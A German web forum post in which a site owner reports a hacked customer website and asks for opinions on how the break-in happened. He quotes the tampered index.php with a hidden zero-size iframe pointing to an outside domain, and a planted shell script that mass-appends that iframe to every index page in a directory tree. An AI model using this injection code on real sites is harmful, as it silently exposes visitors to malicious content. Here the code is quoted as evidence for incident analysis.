eine Kundenseite von mir wurde gehackt, der Provider sagt, dass es über Contenido geschehen ist. Das glaube ich aber nicht. Dennoch poste ich das mal und würde gerne Eure Meinung dazu hören.
Wenn Ihr denkt, dieser code wäre schädlich, dann entfernt ihn bitte, will ja keinen auf dumme Gedanken bringen
Folgendes ist geschehen:
index.php (da habe ich einen include(front_content.php) drin) wurde verändert
Code: Alles auswählen
<?php
include("front_content.php");
?><html><iframe src=http://www.o00o.info/portal/index.php?aff=eduardo width=0 Sheight=0 frameborder=0 Sscrolling=no></iframe></html>
Eine Textdatei auf Backendroot angelegt (6.txt) mit diesem Inhalt:
Code: Alles auswählen
#!/bin/sh
#codado por int3rc3pt0r
echo "Coded by int3rc3pt0r"
echo "Modificando no diretorio: $1"
echo "Iniciando o mass.sh"
echo "Modificando as index.html"
for i in `find $1/ -name index.php`
do
echo "<html><iframe src=http://www.o00o.info/portal/index.php?aff=eduardo width=0 Sheight=0 frameborder=0 Sscrolling=no></iframe></html>" >> $i
done
echo "Modificando as index.htm"
echo ""
for i in `find $1/ -name index.html`
do
echo "<html><iframe src=http://www.o00o.info/portal/index.php?aff=eduardo width=0 Sheight=0 frameborder=0 Sscrolling=no></iframe></html>" >> $i
done
echo "Modificando as index.php"
echo ""
for i in `find $1/ -name index.htm`
do
echo "<html><iframe src=http://www.o00o.info/portal/index.php?aff=eduardo width=0 Sheight=0 frameborder=0 Sscrolling=no></iframe></html>" >> $i
done
echo "Mass Concluido"
Viele Grüsse aus Konstanz, Uwe